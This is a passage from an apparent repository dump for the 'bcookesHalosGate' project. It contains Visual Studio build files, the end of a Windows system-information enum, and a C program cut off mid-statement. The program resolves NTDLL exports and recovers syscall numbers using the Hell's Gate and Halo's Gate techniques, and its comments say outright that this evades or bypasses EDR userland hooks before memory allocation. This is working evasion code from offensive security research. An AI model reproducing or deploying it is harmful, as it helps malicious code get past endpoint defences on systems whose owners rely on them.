PfQuerySuperfetchInformation\r\n\tSystemMemoryListInformation, // 80, q: SYSTEM_MEMORY_LIST_INFORMATION; s: SYSTEM_MEMORY_LIST_COMMAND (requires SeProfileSingleProcessPrivilege)\r\n\tSystemFileCacheInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (same as SystemFileCacheInformation)\r\n\tSystemThreadPriorityClientIdInformation, // s: SYSTEM_THREAD_CID_PRIORITY_INFORMATION (requires SeIncreaseBasePriorityPrivilege)\r\n\tSystemProcessorIdleCycleTimeInformation, // q: SYSTEM_PROCESSOR_IDLE_CYCLE_TIME_INFORMATION[]\r\n\tSystemVerifierCancellationInformation, // not implemented // name:wow64:whNT32QuerySystemVerifierCancellationInformation\r\n\tSystemProcessorPowerInformationEx, // not implemented\r\n\tSystemRefTraceInformation, // q; s // ObQueryRefTraceInformation\r\n\tSystemSpecialPoolInformation, // q; s (requires SeDebugPrivilege) // MmSpecialPoolTag, then MmSpecialPoolCatchOverruns != 0\r\n\tSystemProcessIdInformation, // q: SYSTEM_PROCESS_ID_INFORMATION\r\n\tSystemErrorPortInformation, // s (requires SeTcbPrivilege)\r\n\tSystemBootEnvironmentInformation, // 90, q: SYSTEM_BOOT_ENVIRONMENT_INFORMATION\r\n\tSystemHypervisorInformation, // q; s (kernel-mode only)\r\n\tSystemVerifierInformationEx, // q; s\r\n\tSystemTimeZoneInformation, // s (requires SeTimeZonePrivilege)\r\n\tSystemImageFileExecutionOptionsInformation, // s: SYSTEM_IMAGE_FILE_EXECUTION_OPTIONS_INFORMATION (requires SeTcbPrivilege)\r\n\tSystemCoverageInformation, // q; s // name:wow64:whNT32QuerySystemCoverageInformation; ExpCovQueryInformation\r\n\tSystemPrefetchPatchInformation, // not implemented\r\n\tSystemVerifierFaultsInformation, // s (requires SeDebugPrivilege)\r\n\tSystemSystemPartitionInformation, // q: SYSTEM_SYSTEM_PARTITION_INFORMATION\r\n\tSystemSystemDiskInformation, // q: SYSTEM_SYSTEM_DISK_INFORMATION\r\n\tSystemProcessorPerformanceDistribution, // 100, q: SYSTEM_PROCESSOR_PERFORMANCE_DISTRIBUTION\r\n\tSystemNumaProximityNodeInformation, // q\r\n\tSystemDynamicTimeZoneInformation, // q; s (requires SeTimeZonePrivilege)\r\n\tSystemCodeIntegrityInformation, // q // SeCodeIntegrityQueryInformation\r\n\tSystemProcessorMicrocodeUpdateInformation, // s\r\n\tSystemProcessorBrandString, // q // HaliQuerySystemInformation -> HalpGetProcessorBrandString, info class 23\r\n\tSystemVirtualAddressInformation, // q: SYSTEM_VA_LIST_INFORMATION[]; s: SYSTEM_VA_LIST_INFORMATION[] (requires SeIncreaseQuotaPrivilege) // MmQuerySystemVaInformation\r\n\tSystemLogicalProcessorAndGroupInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX // since WIN7 // KeQueryLogicalProcessorRelationship\r\n\tSystemProcessorCycleTimeInformation, // q: SYSTEM_PROCESSOR_CYCLE_TIME_INFORMATION[]\r\n\tSystemStoreInformation, // q; s // SmQueryStoreInformation\r\n\tSystemRegistryAppendString, // 110, s: SYSTEM_REGISTRY_APPEND_STRING_PARAMETERS\r\n\tSystemAitSamplingValue, // s: ULONG (requires SeProfileSingleProcessPrivilege)\r\n\tSystemVhdBootInformation, // q: SYSTEM_VHD_BOOT_INFORMATION\r\n\tSystemCpuQuotaInformation, // q; s // PsQueryCpuQuotaInformation\r\n\tSystemNativeBasicInformation, // not implemented\r\n\tSystemSpare1, // not implemented\r\n\tSystemLowPriorityIoInformation, // q: SYSTEM_LOW_PRIORITY_IO_INFORMATION\r\n\tSystemTpmBootEntropyInformation, // q: TPM_BOOT_ENTROPY_NT_RESULT // ExQueryTpmBootEntropyInformation\r\n\tSystemVerifierCountersInformation, // q: SYSTEM_VERIFIER_COUNTERS_INFORMATION\r\n\tSystemPagedPoolInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypePagedPool)\r\n\tSystemSystemPtesInformationEx, // 120, q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemPtes)\r\n\tSystemNodeDistanceInformation, // q\r\n\tSystemAcpiAuditInformation, // q: SYSTEM_ACPI_AUDIT_INFORMATION // HaliQuerySystemInformation -> HalpAuditQueryResults, info class 26\r\n\tSystemBasicPerformanceInformation, // q: SYSTEM_BASIC_PERFORMANCE_INFORMATION // name:wow64:whNtQuerySystemInformation_SystemBasicPerformanceInformation\r\n\tSystemQueryPerformanceCounterInformation, // q: SYSTEM_QUERY_PERFORMANCE_COUNTER_INFORMATION // since WIN7 SP1\r\n\tSystemSessionBigPoolInformation, // since WIN8\r\n\tSystemBootGraphicsInformation,\r\n\tSystemScrubPhysicalMemoryInformation,\r\n\tSystemBadPageInformation,\r\n\tSystemProcessorProfileControlArea,\r\n\tSystemCombinePhysicalMemoryInformation, // 130\r\n\tSystemEntropyInterruptTimingCallback,\r\n\tSystemConsoleInformation,\r\n\tSystemPlatformBinaryInformation,\r\n\tSystemThrottleNotificationInformation,\r\n\tSystemHypervisorProcessorCountInformation,\r\n\tSystemDeviceDataInformation,\r\n\tSystemDeviceDataEnumerationInformation,\r\n\tSystemMemoryTopologyInformation,\r\n\tSystemMemoryChannelInformation,\r\n\tSystemBootLogoInformation, // 140\r\n\tSystemProcessorPerformanceInformationEx, // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION_EX // since WINBLUE\r\n\tSystemSpare0,\r\n\tSystemSecureBootPolicyInformation,\r\n\tSystemPageFileInformationEx, // q: SYSTEM_PAGEFILE_INFORMATION_EX\r\n\tSystemSecureBootInformation,\r\n\tSystemEntropyInterruptTimingRawInformation,\r\n\tSystemPortableWorkspaceEfiLauncherInformation,\r\n\tSystemFullProcessInformation, // q: SYSTEM_PROCESS_INFORMATION with SYSTEM_PROCESS_INFORMATION_EXTENSION (requires admin)\r\n\tSystemKernelDebuggerInformationEx, // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX\r\n\tSystemBootMetadataInformation, // 150\r\n\tSystemSoftRebootInformation,\r\n\tSystemElamCertificateInformation,\r\n\tSystemOfflineDumpConfigInformation,\r\n\tSystemProcessorFeaturesInformation, // q: SYSTEM_PROCESSOR_FEATURES_INFORMATION\r\n\tSystemRegistryReconciliationInformation,\r\n\tSystemEdidInformation,\r\n\tSystemManufacturingInformation, // q: SYSTEM_MANUFACTURING_INFORMATION // since THRESHOLD\r\n\tSystemEnergyEstimationConfigInformation, // q: SYSTEM_ENERGY_ESTIMATION_CONFIG_INFORMATION\r\n\tSystemHypervisorDetailInformation, // q: SYSTEM_HYPERVISOR_DETAIL_INFORMATION\r\n\tSystemProcessorCycleStatsInformation, // q: SYSTEM_PROCESSOR_CYCLE_STATS_INFORMATION // 160\r\n\tSystemVmGenerationCountInformation,\r\n\tSystemTrustedPlatformModuleInformation, // q: SYSTEM_TPM_INFORMATION\r\n\tSystemKernelDebuggerFlags,\r\n\tSystemCodeIntegrityPolicyInformation,\r\n\tSystemIsolatedUserModeInformation,\r\n\tSystemHardwareSecurityTestInterfaceResultsInformation,\r\n\tSystemSingleModuleInformation, // q: SYSTEM_SINGLE_MODULE_INFORMATION\r\n\tSystemAllowedCpuSetsInformation,\r\n\tSystemDmaProtectionInformation,\r\n\tSystemInterruptCpuSetsInformation,\r\n\tSystemSecureBootPolicyFullInformation,\r\n\tSystemCodeIntegrityPolicyFullInformation,\r\n\tSystemAffinitizedInterruptProcessorInformation,\r\n\tSystemRootSiloInformation, // q: SYSTEM_ROOT_SILO_INFORMATION\r\n\tMaxSystemInfoClass\r\n} SYSTEM_INFORMATION_CLASS;"
  },
  {
    "path": "bcookesHalosGate.sln",
    "content": "﻿\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.30114.105\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"bcookesHalosGate\", \"bcookesHalosGate.vcxproj\", \"{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.Build.0 = Release|x64\r\n\t\t{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {AAAFFDAB-0074-4A3D-BA5B-63F51AA7F8EB}\r\n\tEndGlobalSection\r\nEndGlobal\r\n"
  },
  {
    "path": "bcookesHalosGate.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup Label=\"ProjectConfigurations\">\r\n    <ProjectConfiguration Include=\"Debug|Win32\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|Win32\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Debug|x64\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|x64\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n  </ItemGroup>\r\n  <PropertyGroup Label=\"Globals\">\r\n    <VCProjectVersion>16.0</VCProjectVersion>\r\n    <Keyword>Win32Proj</Keyword>\r\n    <ProjectGuid>{dc6187cb-d5df-4973-84a2-f92aae90cda9}</ProjectGuid>\r\n    <RootNamespace>bcookesHalosGate</RootNamespace>\r\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\r\n    <ProjectName>bcookesHalosGate</ProjectName>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v142</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n    <SpectreMitigation>false</SpectreMitigation>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    
<PlatformToolset>v142</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n    <SpectreMitigation>false</SpectreMitigation>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v142</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n    <SpectreMitigation>false</SpectreMitigation>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v142</PlatformToolset>\r\n    <WholeProgramOptimization>false</WholeProgramOptimization>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n    <SpectreMitigation>false</SpectreMitigation>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\r\n  <ImportGroup Label=\"ExtensionSettings\">\r\n    <Import Project=\"$(VCTargetsPath)\\BuildCustomizations\\masm.props\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"Shared\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" 
Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <PropertyGroup Label=\"UserMacros\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      
<IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n      <Optimization>Disabled</Optimization>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"main.c\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"bcookesHalosGate.h\" />\r\n  
</ItemGroup>\r\n  <ItemGroup>\r\n    <MASM Include=\"bcookesHalosGate.asm\">\r\n      <FileType>Document</FileType>\r\n    </MASM>\r\n  </ItemGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\r\n  <ImportGroup Label=\"ExtensionTargets\">\r\n    <Import Project=\"$(VCTargetsPath)\\BuildCustomizations\\masm.targets\" />\r\n  </ImportGroup>\r\n</Project>"
  },
  {
    "path": "bcookesHalosGate.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup>\r\n    <Filter Include=\"Source Files\">\r\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\r\n      <Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Header Files\">\r\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\r\n      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Resource Files\">\r\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\r\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\r\n    </Filter>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"main.c\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"bcookesHalosGate.h\">\r\n      <Filter>Header Files</Filter>\r\n    </ClInclude>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <MASM Include=\"bcookesHalosGate.asm\">\r\n      <Filter>Source Files</Filter>\r\n    </MASM>\r\n  </ItemGroup>\r\n</Project>"
  },
  {
    "path": "bcookesHalosGate.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <PropertyGroup />\r\n</Project>"
  },
  {
    "path": "main.c",
    "content": "/*\r\nAuthor: Bobby Cooke @0xBoku | https://github.com/boku7 | https://0xBoku.com | https://www.linkedin.com/in/bobby-cooke/\r\nCredits / References: Pavel Yosifovich (@zodiacon), Reenz0h from @SEKTOR7net, @smelly__vx & @am0nsec ( Creators/Publishers of the Hells Gate technique)\r\n*/\r\n#include <Windows.h>\r\n#include \"bcookesHalosGate.h\"\r\n#include <stdio.h>\r\n\r\n// Select the syscall number that the next HellDescent() call will issue\r\nextern VOID HellsGate(WORD wSystemCall);\r\n// Deliberately unprototyped: the same assembly stub is called with the argument list of whichever syscall HellsGate() selected\r\nextern NTSTATUS HellDescent();\r\n\r\nEXTERN_C PVOID getntdll();\r\n\r\nEXTERN_C PVOID getExportTable(\r\n\tIN PVOID moduleAddr\r\n);\r\n\r\nEXTERN_C PVOID getExAddressTable(\r\n\tIN PVOID moduleExportTableAddr,\r\n\tIN PVOID moduleAddr\r\n);\r\n\r\nEXTERN_C PVOID getExNamePointerTable(\r\n\tIN PVOID moduleExportTableAddr,\r\n\tIN PVOID moduleAddr\r\n);\r\n\r\nEXTERN_C PVOID getExOrdinalTable(\r\n\tIN PVOID moduleExportTableAddr,\r\n\tIN PVOID moduleAddr\r\n);\r\n\r\nEXTERN_C PVOID getApiAddr(\r\n\tIN DWORD apiNameStringLen,\r\n\tIN LPCSTR apiNameString,\r\n\tIN PVOID moduleAddr,\r\n\tIN PVOID ExExAddressTable,\r\n\tIN PVOID ExNamePointerTable,\r\n\tIN PVOID ExOrdinalTable\r\n);\r\n\r\nEXTERN_C DWORD findSyscallNumber(\r\n\tIN PVOID ntdllApiAddr\r\n);\r\n\r\n// HalosGate helpers called from main(): read the syscall number from the unhooked stub `index` entries above / below ntdllApiAddr.\r\n// Both are assumed to live in bcookesHalosGate.asm with the same signature as the halosGate declaration this file originally carried.\r\nEXTERN_C DWORD halosGateUp(\r\n\tIN PVOID ntdllApiAddr,\r\n\tIN WORD index\r\n);\r\n\r\nEXTERN_C DWORD halosGateDown(\r\n\tIN PVOID ntdllApiAddr,\r\n\tIN WORD index\r\n);\r\n\r\nEXTERN_C DWORD compExplorer(\r\n\tIN PVOID explorerWString\r\n);\r\n\r\nPVOID ntdll = NULL;\r\nPVOID ntdllExportTable = NULL;\r\n\r\nPVOID ntdllExAddrTbl = NULL;\r\nPVOID ntdllExNamePtrTbl = NULL;\r\nPVOID ntdllExOrdinalTbl = NULL;\r\n\r\nconst char ntQrySysInfoStr[] = \"NtQuerySystemInformation\";\r\nDWORD ntQrySysInfoStrLen = 0;\r\nPVOID ntQrySysInfoAddr = NULL;\r\nDWORD ntQrySysInfoSyscallNumber = 0;\r\n\r\nconst char ntAllocVMStr[] = \"NtAllocateVirtualMemory\";\r\nDWORD ntAllocVMStrLen = 0;\r\nPVOID ntAllocVMAddr = NULL;\r\nDWORD ntAllocVMSyscallNumber = 0;\r\n\r\nSYSTEM_PROCESS_INFORMATION* procinfo;\r\n\r\nvoid main() 
{\r\n\tprintf(\"###################################################################\\r\\n\");\r\n\t// Use Position Independent Shellcode to resolve the address of NTDLL and its export tables\r\n\tntdll = getntdll();\r\n\tprintf(\"[+] %p : NTDLL Base Address\\r\\n\", ntdll);\r\n\r\n\tntdllExportTable = getExportTable(ntdll);\r\n\tprintf(\"[+] %p : NTDLL Export Table Address\\r\\n\", ntdllExportTable);\r\n\r\n\tntdllExAddrTbl = getExAddressTable(ntdllExportTable, ntdll);\r\n\tprintf(\"[+] %p : NTDLL Export Address Table Address\\r\\n\", ntdllExAddrTbl);\r\n\r\n\tntdllExNamePtrTbl = getExNamePointerTable(ntdllExportTable, ntdll);\r\n\tprintf(\"[+] %p : NTDLL Export Name Pointer Table Address\\r\\n\", ntdllExNamePtrTbl);\r\n\r\n\tntdllExOrdinalTbl = getExOrdinalTable(ntdllExportTable, ntdll);\r\n\tprintf(\"[+] %p : NTDLL Export Ordinal Table Address\\r\\n\", ntdllExOrdinalTbl);\r\n\tprintf(\"###################################################################\\r\\n\\r\\n\");\r\n\t// Find the address of NTDLL.NtQuerySystemInformation by looping through NTDLL export tables\r\n\tntQrySysInfoStrLen = sizeof(ntQrySysInfoStr);\r\n\tprintf(\"[-] Looping through NTDLL Export tables to discover the address for NTDLL.%s..\\r\\n\", ntQrySysInfoStr);\r\n\tntQrySysInfoAddr = getApiAddr(\r\n\t\tntQrySysInfoStrLen,\r\n\t\tntQrySysInfoStr,\r\n\t\tntdll,\r\n\t\tntdllExAddrTbl,\r\n\t\tntdllExNamePtrTbl,\r\n\t\tntdllExOrdinalTbl\r\n\t);\r\n\tprintf(\"[+] %p : NTDLL.%s Address\\r\\n\\r\\n\", ntQrySysInfoAddr, ntQrySysInfoStr);\r\n\tprintf(\"[-] Using HellsGate technique to discover syscall for %s..\\r\\n\", ntQrySysInfoStr);\r\n\t// HellsGate technique to recover the systemcall number\r\n\tntQrySysInfoSyscallNumber = findSyscallNumber(ntQrySysInfoAddr);\r\n\t// HalosGate technique to recover the systemcall number. Used when stub in NTDLL is hooked. This evades/bypasses EDR Userland hooks\r\n\tif (ntQrySysInfoSyscallNumber == 0) {\r\n\t\tprintf(\"[!] 
Failed to discover the syscall number for %s. The API is likely hooked by EDR\\r\\n\", ntQrySysInfoStr);\r\n\t\tprintf(\"[-] Using HalosGate technique to discover syscall for %s..\\r\\n\", ntQrySysInfoStr);\r\n\t\tDWORD index = 0;\r\n\t\t// Walk the neighbouring stubs in both directions. The bound (500, chosen here) stops the walk from running past the end of NTDLL when every neighbour is hooked as well\r\n\t\twhile (ntQrySysInfoSyscallNumber == 0 && index < 500) {\r\n\t\t\tindex++;\r\n\t\t\t// Check for an unhooked syscall stub above the target stub\r\n\t\t\tntQrySysInfoSyscallNumber = halosGateUp(ntQrySysInfoAddr, index);\r\n\t\t\tif (ntQrySysInfoSyscallNumber) {\r\n\t\t\t\tntQrySysInfoSyscallNumber = ntQrySysInfoSyscallNumber - index;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\t// Check for an unhooked syscall stub below the target stub\r\n\t\t\tntQrySysInfoSyscallNumber = halosGateDown(ntQrySysInfoAddr, index);\r\n\t\t\tif (ntQrySysInfoSyscallNumber) {\r\n\t\t\t\tntQrySysInfoSyscallNumber = ntQrySysInfoSyscallNumber + index;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (ntQrySysInfoSyscallNumber == 0) {\r\n\t\t\tprintf(\"[!] Could not resolve the syscall number for %s, giving up\\r\\n\", ntQrySysInfoStr);\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n\tprintf(\"[+] %x : Syscall number for NTDLL.%s\\r\\n\\r\\n\", ntQrySysInfoSyscallNumber, ntQrySysInfoStr);\r\n\r\n\t// Find the address of NTDLL.NtAllocateVirtualMemory by looping through NTDLL export tables\r\n\tntAllocVMStrLen = sizeof(ntAllocVMStr);\r\n\tntAllocVMAddr = getApiAddr(\r\n\t\tntAllocVMStrLen,\r\n\t\tntAllocVMStr,\r\n\t\tntdll,\r\n\t\tntdllExAddrTbl,\r\n\t\tntdllExNamePtrTbl,\r\n\t\tntdllExOrdinalTbl\r\n\t);\r\n\tprintf(\"[+] %p : NTDLL.%s Address\\r\\n\", ntAllocVMAddr, ntAllocVMStr);\r\n\tprintf(\"[-] Using HellsGate technique to discover syscall for %s..\\r\\n\", ntAllocVMStr);\r\n\t// HellsGate technique to recover the systemcall number\r\n\tntAllocVMSyscallNumber = findSyscallNumber(ntAllocVMAddr);\r\n\t// HalosGate technique to recover the systemcall number. Used when stub in NTDLL is hooked. This evades/bypasses EDR Userland hooks\r\n\tif (ntAllocVMSyscallNumber == 0) {\r\n\t\tprintf(\"[!] Failed to discover the syscall number for %s. 
The API is likely hooked by EDR\\r\\n\", ntAllocVMStr);\r\n\t\tprintf(\"[-] Using HalosGate technique to discover syscall for %s..\\r\\n\", ntAllocVMStr);\r\n\t\tDWORD index = 0;\r\n\t\t// Walk the neighbouring stubs in both directions. The bound (500, chosen here) stops the walk from running past the end of NTDLL when every neighbour is hooked as well\r\n\t\twhile (ntAllocVMSyscallNumber == 0 && index < 500) {\r\n\t\t\tindex++;\r\n\t\t\t// Check for an unhooked syscall stub above the target stub\r\n\t\t\tntAllocVMSyscallNumber = halosGateUp(ntAllocVMAddr, index);\r\n\t\t\tif (ntAllocVMSyscallNumber) {\r\n\t\t\t\tntAllocVMSyscallNumber = ntAllocVMSyscallNumber - index;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\t// Check for an unhooked syscall stub below the target stub\r\n\t\t\tntAllocVMSyscallNumber = halosGateDown(ntAllocVMAddr, 